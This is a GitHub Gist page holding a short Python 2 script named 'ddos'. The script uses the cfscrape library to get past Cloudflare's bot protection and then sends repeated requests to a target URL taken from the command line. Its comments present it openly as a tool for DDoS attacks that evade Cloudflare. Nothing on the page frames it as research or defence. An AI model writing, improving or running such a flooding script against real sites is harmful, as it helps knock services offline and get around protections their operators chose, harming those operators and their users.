Created
July 23, 2017 17:48
-
-
Save cthpw103/42045d05a0d4947196fe541e7c612f3c to your computer and use it in GitHub Desktop.
ddos
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Bypass by cth103 | |
#i'm sorry | |
#og code by tin-tnguyen | |
#DDoS without caring bout cloudfare | |
import cfscrape, sys, os | |
print "Attacking " + sys.argv[1] + " ... " | |
def attack(): | |
scraper = cfscrape.create_scraper() | |
print "Requesting.." | |
scraper.get(sys.argv[1]) | |
print "Ended Requesting" | |
for i in range(1, 1000): | |
attack() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment